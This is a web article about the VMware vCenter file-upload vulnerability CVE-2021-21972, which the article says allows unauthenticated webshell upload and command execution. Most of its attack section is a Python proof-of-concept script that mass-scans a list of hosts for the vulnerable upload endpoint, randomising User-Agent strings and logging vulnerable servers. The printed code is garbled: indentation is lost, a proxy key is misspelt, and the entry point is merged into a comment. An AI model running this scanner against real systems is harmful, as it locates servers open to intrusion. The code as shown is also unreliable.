About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)
backgroundCVE-2021-21972 An unauthenticated command execution vulnerability in VMware vCenter. This vulnerability can upload a webshell to any location on the vcenter server and then execute the webshell. Affected versions vmware:esxi:7.0/6.7/6.5 Vulnerability reproduction fofa query Syntax:
POC
Use
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import requests
import argparse
import http.client
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
proxies = {"scoks5": "http://127.0.0.1:1081"}
headers = {
'User-Agent': get_ua(),
"Content-Type": "application/x-www-form-urlencoded"
}
targetUrl = url + TARGET_URI
try:
res = requests.get(targetUrl,
headers=headers,
timeout=15,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
# print(len(res.text))
if res.status_code == 405:
print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("vulnerability address.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " No CVE-2021-21972 vulnerability was found.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # default 15 threads if __name__ == "__main__":
main()
EXP Repair Suggestions Upgrade vCenter Server 7.0 to 7.0.U1c This is the end of this article about the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972). For more related VMware vcenter upload vulnerability content, please search 123WORDPRESS.COM's previous articles or continue to browse the following related articles. I hope everyone will support 123WORDPRESS.COM in the future! You may also be interested in:
|
<<: Introduction to query commands for MySQL stored procedures
>>: Vue makes div height draggable
Recommend
Detailed explanation of CSS multiple three-column adaptive layout implementation
Preface In order to follow the conventional WEB l...
How to create LVM for XFS file system in Ubuntu
Preface lvm (Logical Volume Manager) logical volu...
MySQL-group-replication configuration steps (recommended)
MySQL-Group-Replication is a new feature develope...
Convert psd cut image to div+css format
PSD to div css web page cutting example Step 1: F...
MySQL sql_mode analysis and setting explanation
When inserting a set of data into the MySQL datab...
A thorough understanding of js native syntax prototype, __proto__ and constructor
Table of contents 1 Introduction 2 Prerequisites ...
A brief talk about JavaScript parasitic composition inheritance
Composition inheritance Combination inheritance i...
Full HTML of the upload form with image preview
The upload form with image preview function, the ...
How to configure Nginx's anti-hotlinking
Experimental environment • A minimally installed ...
MySQL database development specifications [recommended]
Recently, we have been capturing SQL online for o...
Layui implements sample code for multi-condition query
I recently made a file system and found that ther...
Quickly get started with VUE 3 teleport components and usage syntax
Table of contents 1. Introduction to teleport 1.1...
Five things a good user experience designer should do well (picture and text)
This article is translated from the blog Usability...
WeChat applet canvas implements signature function
In the WeChat applet project, the development mod...
Commonly used HTML meta tag attributes (needed for website compatibility and optimization)
Original URL: http://segmentfault.com/blog/ciaocc/...